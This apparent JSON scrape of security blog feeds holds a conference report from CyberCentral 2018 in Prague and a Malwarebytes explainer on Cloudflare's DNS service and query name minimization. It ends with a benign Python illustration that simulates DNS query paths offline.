"reporter": "noreply@blogger.com (Vanja Svajcer)", "published": "2018-04-23T09:44:00", "type": "talosblog", "title": "Cryptomining Campaign Returns Coal and Not Diamond", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-24T14:39:11", "id": "TALOSBLOG:66A9904BDE99019760E581153C5742BF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/5RBkUbicJr4/cryptomining-campaign-returns-coal-not-diamond.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "avleonov": [{"lastseen": "2018-04-23T09:02:09", "_object_types": 
["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Almost the whole of last week I spent in Prague at the [CyberCentral](<https://cybercentral.eu/>) conference. It was a pretty unique experience for me. It was my first time at an international conference as a speaker. And not only did I present my report there, but I also led the round table on Vulnerability Management and participated in a panel session.\n\nFrom my point of view, everything was pretty good. I successfully closed my gestalt on public speaking in English. I definitely can do it.\n\nThe event was held in the Lucerna passage right in the center of Prague. It is a beautiful Art Nouveau building with the famous ironic \"Statue of King Wenceslas Riding an Upside-Down Dead Horse\".\n\nEven to speak in this building was a great honor. In my opinion the place was chosen ideally. It is beautiful and very well located. Lots of good hotels, restaurants and all the main tourist attractions were nearby. It was easy to go for a walk in the spare time. Some photos you can see on my Facebook page [[1](<https://www.facebook.com/avleonov/posts/10214853806074979>),[2](<https://www.facebook.com/avleonov/posts/10214854128083029>)].\n\n### Day 0\n\nThe first, pre-conference day I spent at the Application Security training by [Milan Pikula](<https://www.linkedin.com/in/pikula/>), Security Analyst Lead at [SK-CERT](<http://www.nbusr.sk/en/cyber-security/sk-csirt/index.html>). He demonstrated how to exploit some basic web application vulnerabilities and how to use binary analysis methods. It was possible to give it a try: all the vulnerable applications were available to the audience.\n\nI need to say that the Small Lucerna cinema hall is very comfortable for such trainings. Every chair had a small built-in table for a laptop and a power socket.\n\nIn the evening we had a great dinner for the speakers at the [V\u00fdtopna Restaurant](<https://vytopna.cz>). 
A great feature of this restaurant is the working model railroad that runs right along the tables, with small trains serving drinks to the customers. The food was also pretty good.\n\nCyberCentral is not a very big conference compared to the main Russian events for security practitioners: [PHDays](<https://avleonov.com/2017/05/29/phdays-vii-to-vulnerability-database-and-beyond/>) and [ZeroNights](<https://avleonov.com/2017/11/19/zeronights-2017-back-to-the-cyber-80s/>). At the same time it is an advantage. It's much better for networking. Everyone is in sight, everyone is available for a talk.\n\nAn important reason to visit European information security events is that you can meet people there who do not attend Russian international conferences. Moscow is a little bit far away for them and it's necessary to get a visa. It's much easier to meet in one of the European countries. By the way, despite the fact that the conference was held in the Czech Republic, most of the attendees were from neighboring Slovakia. There were also many people from Germany, Great Britain and the Balkan countries, and practically from all other corners of Europe.\n\n### Day 1\n\nFrom the first day of the conference I can mention the great presentation by [Marco Ermini](<https://www.xing.com/profile/Marco_Ermini>), Senior Security Architect Hosts & Networks at Telefonica O2. He was talking about how security risks and threats are connected with merger and acquisition activities. I especially liked the second part of his presentation, which was about OSINT tools. I had some experience in Competitive Analysis and used similar techniques for getting information about different organisations from publicly available data.\n\nOn the same day I led the round table on Vulnerability Management. Networking was pretty fun. 5 people participated. We discussed Tenable and other VM vendors, who drag everything into their clouds. 
^_^ We also talked about compliance scanning, GDPR and life in our countries.\n\n### Day 2\n\nThe second day was THE day for me. First of all, I presented my report \"Enterprise Vulnerability Management: fancy marketing brochures and the real-life troubles\".\n\nYou can see the slides on Slideshare.\n\nI had been preparing this presentation since October 2017 and partly showed it at the [ISACA Moscow meetup](<https://avleonov.com/2017/10/23/isaca-moscow-vulnerability-management-meetup-2017/>). Of course, for CyberCentral I updated it a lot: added [research on CWE](<https://avleonov.com/2017/10/21/cwes-in-nvd-cve-feed-analysis-and-complaints/>), [Nessus exploits](<https://avleonov.com/2017/11/02/exploitability-attributes-of-nessus-plugins-good-bad-and-vulners/>), [IDC](<https://avleonov.com/2018/03/16/my-short-review-of-idc-worldwide-security-and-vulnerability-management-market-shares-2016/>) and [Forrester](<https://avleonov.com/2018/03/20/my-short-review-of-the-forrester-wave-vulnerability-risk-management-q1-2018/>) marketing reports, the latest problems with [Nessus](<https://avleonov.com/2017/12/13/new-nessus-7-professional-and-the-end-of-cost-effective-vulnerability-management-as-we-knew-it/>) and [OpenVAS](<https://avleonov.com/2018/03/28/openvas-knowledge-base-become-smaller/>). I also spoke a little bit about [my vulnerability scanner Vulchain](<https://avleonov.com/2018/04/06/vulchain-scan-workflow-and-search-queries/>) and added wonderful examples of patching problems related to the latest Spectre and Meltdown vulnerabilities.\n\nFinally, I ended up with this presentation plan:\n\n 1. Typical VM Solution\n 2. Inconvenient Questions\n 3. What actually should we scan? \n * [Perimeter](<https://avleonov.com/2017/11/28/vulnerability-management-for-network-perimeter/>)\n * Office\n * Business critical / Production\n 4. VM Analyst's Heaven and Hell\n 5. Vulnerability Management Market\n 6. Outrageously expensive solutions\n 7. 
Limited license = Limited IT Visibility\n 8. [The end of cost-effective VM (Nessus 7)](<https://avleonov.com/2017/12/13/new-nessus-7-professional-and-the-end-of-cost-effective-vulnerability-management-as-we-knew-it/>)\n 9. [OpenVAS \u201cAttic Cleanup\u201d](<https://avleonov.com/2018/03/28/openvas-knowledge-base-become-smaller/>)\n 10. [What about your own scanner?](<https://avleonov.com/2018/04/06/vulchain-scan-workflow-and-search-queries/>)\n 11. All Vulnerability Scanners are the same? \n * [CVE-based comparison](<https://avleonov.com/2016/11/27/fast-comparison-of-nessus-and-openvas-knowledge-bases/>)\n 12. Reports: problem of prioritization \n * [Common Weakness Enumeration (CWE)](<https://avleonov.com/2017/10/21/cwes-in-nvd-cve-feed-analysis-and-complaints/>)\n * [Exploitability flags](<https://avleonov.com/2017/11/02/exploitability-attributes-of-nessus-plugins-good-bad-and-vulners/>)\n 13. Dynamic reports\n 14. Why *they* don\u2019t patch vulnerabilities \n * It\u2019s great when you can update the OS automatically, but\u2026\n * Something can break after an update\n * An update can make the situation even worse (Spectre and Meltdown)\n * The neverending story of 3rd-party software patching\n * Fifty Shades of Legacy\n * Some systems are just difficult to update\n\nAnd I made the following conclusions:\n\n 1. There is no magic in Vulnerability Management\n 2. Vulnerability scanners are awesome. Trust them, but not too much.\n 3. Homegrown automation is still necessary: \n * Update scan targets (Wiki, DNS, WAF/AntiDDoS, AD, Monitoring\u2026) and manage regular scan tasks\n * Get critical exploitable vulnerabilities from scan results\n * Inform the responsible person / create tasks\n * Get statistics and visualize the VM process\n\nIn the Q&A section, we talked very nicely about the problems of detecting vulnerabilities in self-assembled software packages and about backported patches. 
Also there were interesting questions about [Vulchain](<https://avleonov.com/2018/04/06/vulchain-scan-workflow-and-search-queries/>) and the detection methods that it currently uses. ^_^\n\nIn the same technical stream I liked 2 presentations:\n\n * The first one, \"Regulations vs. actual security. The bottom line.\" by [Viktor Larionov](<https://www.linkedin.com/in/vlarionov/>), Director Of Operations at Nordicore Operations Ltd. He was talking about regulators who always check the documents and not the servers. I am working on actual security and naturally I would like to see more server checks during such audits.\n * The second one, \"Building Great SOC & CSIRT from Open-source Components\" by [Milan Pikula](<https://www.linkedin.com/in/pikula/>), Security Analyst Lead at [SK-CERT](<http://www.nbusr.sk/en/cyber-security/sk-csirt/index.html>). It was especially interesting to see what they use for Vulnerability Management. For example, I learned about the [Taranis](<https://taranis.ncsc.nl/>) project. Here is a slide with the main SOC components:\n\nThen I participated in the \"International Panel on Worldwide Trends\". It was the last talk of the event.\n\nThe plenary session also went well:\n\n * We talked about the trends. I said that nothing fundamentally new is happening. The vast majority of cases that we all have seen recently happened because people do not patch their systems on the perimeter (Equifax and Apache Struts), in the internal network (Windows, [WannaCry](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>), [Petya](<https://avleonov.com/2017/06/30/petya-the-great-and-why-they-dont-patch-vulnerabilities/>), etc.) or do not do minimal hardening (Cisco Smart Install). And as long as people don't pay much attention to Vulnerability and Patch Management there will be lots of such massive attacks.\n * Then we talked about awareness. 
I said that training employees is wonderful, but we shouldn't forget to make effective minimization of privileges our first priority.\n * The social problem of cybercrime was also discussed. Nothing new: whitehats and blackhats grow from the same children. We should start working with them earlier: show them how they can do what they really like to do while staying on the light side, and how to earn money without the risk of going to jail.\n\nIt was a very intense week. Lots of new connections and interesting talks. Big thanks to the organizers, especially to [Alexander Nevski](<https://www.linkedin.com/in/alexander-nevski/>), Cyber Security Program Director at EBCG, and all participants! It was awesome. =)\n\n", "reporter": "Alexander Leonov", "published": "2018-04-22T12:23:50", "type": "avleonov", "title": "CyberCentral Summit 2018 in Prague", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-22T12:23:50", "id": "AVLEONOV:9D792E1EA613C0D66266ACAA86B9B957", "href": "http://feedproxy.google.com/~r/avleonov/~3/l76Pez8VykM/", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-04-23T10:31:47", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Are you looking for a free way to speed up your internet and gain some extra privacy in the process? Keep reading, because Cloudflare (the Web Performance & Security Company) is offering a free new DNS service. And it helped me improve the speed of my DNS lookups.\n\n### What is DNS?\n\nDNS is short for Domain Name System. It is the internet protocol that lets user systems identify a web server by its domain name (the host part of a URL) rather than by typing in the server's actual IP address. 
For example, at the time of writing the IP address for Malwarebytes.com is 104.72.35.176, but rather than typing that into your browser, you just type \u2018malwarebytes.com,\u2019 and your system asks a \u2018DNS server\u2019 (a recursive resolver), which looks the name up on your behalf by querying the servers that are authoritative for that domain, caches the answer, and returns the IP address to your system. Unfortunately, if a popular DNS server is taken down or in some way disrupted, many users are unable to reach their favorite websites because, without the IP address of the web server, your system cannot find the site. When trying to explain the concept of DNS name resolution, I think that finding a phone number for a certain person is a good analogy. There are several ways to find a person\u2019s phone number and the same is true for resolving the IP address that belongs to a domain name.\n\n### Which DNS servers am I using now?\n\nIf you have to ask yourself that question, there\u2019s a big chance that you are using the DNS service provided by your internet provider. And while some of those are quite good, others are deplorable. Those who have looked into changing their DNS servers have probably ended up using [Google\u2019s public DNS](<https://developers.google.com/speed/public-dns/>), or, if they were also interested in a web filter, they might have ended up using [Cisco\u2019s OpenDNS](<https://system.opendns.com>). IMHO those are the two most popular alternatives to the ones provided by ISPs around the globe, but many more are available.\n\n### Why would I change to Cloudflare\u2019s?\n\nWe are not saying you should, but their claims sound very promising. 
Even if the differences in speed and privacy are not directly noticeable, you may be convinced by these arguments:\n\n * Cloudflare\u2019s service is 5 times faster than the average ISP\u2019s ([8 milliseconds compared to 70](<https://www.tomsguide.com/us/cloudflare-dns-1.1.1.1-set-up,news-26964.html>)).\n * ISP resolvers typically accept only plain, unencrypted DNS, and not all of them validate [DNSSEC](<https://blog.malwarebytes.com/security-world/2017/02/dnssec-why-do-we-need-it/>). Unencrypted queries can be read or altered by anyone on the network path, and without DNSSEC validation a forged answer from a man-in-the-middle goes undetected.\n * Many companies collect data from their DNS customers to use for commercial purposes. Cloudflare promises not to mine any user data. Logs are kept for 24 hours for debugging purposes, then they are purged.\n * [Query name minimization](<https://blog.erratasec.com/2017/08/query-name-minimization.html#.WtimxR6geUk>) diminishes privacy leakage by only sending minimal query names to authoritative DNS servers.\n\nThat last one may need some explanation. Resolving a name like www.example.com means asking several authoritative servers in turn: the root servers, the .com servers and finally the servers for example.com itself. A classic resolver sends the full name to every one of them, even though the root servers only need to know about com and the .com servers only about example.com. A resolver that minimizes query names asks each server only for the part it is responsible for, so the full hostname is seen only by the servers that actually need it. The less information the servers on the path receive, the less is revealed if one of them is compromised, logs its traffic, or is breached.\n\n### How to change your DNS servers?\n\nThe method to change your DNS servers depends very much on the level at which you want to change them and on the operating system you are using. If you have tried the DNS service and decide that you like it, it might be advisable to change the DNS servers at the router level, so you don\u2019t have to do it for each device separately. To do this successfully your computers and devices need to be set up for DHCP, or they will not even look at the router for DNS information. 
[Lifewire published a guide for the most common routers](<https://www.lifewire.com/how-to-change-dns-servers-on-most-popular-routers-2617995>) that might prove to be handy. For mobile devices, be aware that they will use different DNS servers once they are no longer connected to your router.\n\nAt the device level, the OS is the deciding factor on how you can change the DNS servers.\n\n * [How to Change DNS Servers in Windows](<https://www.lifewire.com/how-to-change-dns-servers-in-windows-2626242>)\n * [How to Change Your Mac's DNS Settings](<https://www.lifewire.com/network-preference-pane-change-macs-dns-settings-2260394>)\n * [Change Your DNS Settings on iPhone, iPod Touch, and iPad](<https://techinch.com/blog/change-your-dns-settings-on-iphone-ipod-touch-and-ipad>)\n * [How to Change the DNS for an Android](<http://smallbusiness.chron.com/change-dns-android-28423.html>)\n * [Change DNS settings on Linux](<https://support.rackspace.com/how-to/changing-dns-settings-on-linux/>)\n\n### Testing the difference\n\nTo check whether switching DNS service would be a possible speed improvement for you, you can use a free tool called NameBench.\n\n_Background information: the NameBench tool is offered by Google and was launched around the same time that Google started offering their free DNS service._\n\nNameBench can be downloaded from [Google Code](<https://code.google.com/archive/p/namebench/downloads>) \u2013 there are suitable versions for several operating systems \u2013 and after installation, you can specify the DNS servers that you would like it to test.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/NameBench.png> \"\" )\n\n * Google Public DNS: 8.8.8.8\n * Cloudflare DNS: 1.1.1.1\n * OpenDNS : 208.67.222.123\n\nIt does help to set \u201cYour location,\u201d but my laptop travels a lot, so I skipped that. 
Then \u201cStart Benchmark\u201d and be patient for a while, because it may take some time before the application is done testing (it took almost half an hour on my laptop). The results will have a layout similar to this one:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/NBReport.png> \"\" )\n\n_While your results may be very different from mine, you can tell that it can definitely pay off to do this test if you are looking for a speed improvement._\n\nSo, a speed improvement of 13.5% and a promise of added privacy. What am I going to do? Well, at least I\u2019ll try it for a while to see if it makes a real difference. And note that I was already using an alternative to my provider\u2019s DNS service, which was terrible to begin with.\n\n### Summary\n\nFor most internet users it is worth looking into which DNS service works best for them, be it for a speed improvement or for some of the added benefits that some of these DNS services have to offer, like additional privacy or parental controls. But most will keep on using the ones provided by their ISP because they just can\u2019t be bothered or find it too complicated to change the settings. 
We do our best to encourage our readers to make informed choices and decide for themselves who they want to trust with the data that can be derived from DNS lookups.\n\nBe safe!\n\nThe post [Cloudflare\u2019s new DNS service](<https://blog.malwarebytes.com/101/how-tos/2018/04/cloudflares-new-dns-service/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "Pieter Arntz", "published": "2018-04-20T16:00:00", "type": "malwarebytes", "title": "Cloudflare\u2019s new DNS service", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-20T16:00:00", "id": "MALWAREBYTES:D7318655D02357D3F77BA12E17E39068", "href": "https://blog.malwarebytes.com/101/how-tos/2018/04/cloudflares-new-dns-service/", "cvss": {"score": 0.0, "vector": "NONE"}}]}}
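The query name minimization bullet in the Malwarebytes DNS post above is easier to see in code than in prose. The following Python is an added example; it is not code from the post, from Cloudflare or from NameBench. It assumes a constructed delegation chain for the hypothetical hostname www.example.com (root, com., example.com.) and sends no network traffic: it lists which names each authoritative server on the path receives from a classic resolver and from an RFC 7816 style minimizing resolver, and encodes one of those queries into DNS wire format so the difference in what leaves the resolver is concrete.

```python
"""Query name minimization (RFC 7816) and DNS wire format, demonstrated offline.

Added example; this is not code from the Malwarebytes post, from Cloudflare or
from NameBench. The delegation chain ZONES and the hostname are constructed for
illustration; no network traffic is sent.
"""
import struct

# Constructed delegation chain for the hypothetical name www.example.com:
# the root zone, the .com TLD zone and the example.com zone.
ZONES = [".", "com.", "example.com."]

QTYPES = {"A": 1, "NS": 2}
QTYPE_NAMES = {code: name for name, code in QTYPES.items()}


def labels(name):
    """Split 'www.example.com.' into ['www', 'example', 'com']; the root has no labels."""
    return [label for label in name.rstrip(".").split(".") if label]


def classic_queries(name, zones):
    """Queries a non-minimizing resolver sends while walking the delegation chain.

    Every authoritative server on the path, root included, receives the full
    name and the real query type.
    """
    full = ".".join(labels(name)) + "."
    return [(zone, full, "A") for zone in zones]


def minimized_queries(name, zones):
    """Queries a qname-minimizing resolver sends (RFC 7816 style).

    Each zone is asked, with an NS query, only for the child one label below
    its own apex. The full name and the real type go only to the zone that
    owns it; if the final known zone owns several more labels, labels are
    added one at a time to that same zone.
    """
    parts = labels(name)
    total = len(parts)
    out = []
    for i, zone in enumerate(zones):
        revealed = len(labels(zone)) + 1       # one label beyond the zone apex
        while revealed <= total:
            qname = ".".join(parts[-revealed:]) + "."
            qtype = "A" if revealed == total else "NS"
            out.append((zone, qname, qtype))
            if revealed == total:
                return out                     # full name reached: done
            if i < len(zones) - 1:
                break                          # hand off to the child zone
            revealed += 1                      # last known zone: keep adding labels
    return out


def servers_seeing_full_name(queries, name):
    """Zones that learned the complete hostname from the given query list."""
    full = ".".join(labels(name)) + "."
    return [zone for zone, qname, _ in queries if qname == full]


def encode_name(name):
    """DNS wire encoding: length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in labels(name):
        raw = label.encode("ascii")
        if len(raw) > 63:
            raise ValueError("label too long: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(qname, qtype, txid=0x1234):
    """Build the 12-byte header plus one question for an iterative (RD=0) query."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", QTYPES[qtype], 1)


def parse_question(packet):
    """Decode the question section of a single-question DNS message."""
    qdcount = struct.unpack("!H", packet[4:6])[0]
    if qdcount != 1:
        raise ValueError("expected exactly one question, got %d" % qdcount)
    pos, parts = 12, []
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointers are not expected in a question")
        parts.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    qtype_code = struct.unpack("!H", packet[pos:pos + 2])[0]
    return ".".join(parts) + ".", QTYPE_NAMES.get(qtype_code, str(qtype_code))


if __name__ == "__main__":
    host = "www.example.com"
    for title, queries in (("classic", classic_queries(host, ZONES)),
                           ("minimized", minimized_queries(host, ZONES))):
        print(title)
        for zone, qname, qtype in queries:
            print("  ask %-13s for %-20s %s  wire=%s" % (
                zone, qname, qtype, build_query(qname, qtype).hex()))
        print("  full name seen by:", servers_seeing_full_name(queries, host))
```

With the classic walk all three zones learn `www.example.com.`; with minimization only example.com's own servers do, while the root and .com servers see just `com.` and `example.com.` as NS queries. The wire encoding shows what actually leaves the resolver: the root server gets a 21-byte packet whose question is `\x03com\x00` and nothing more.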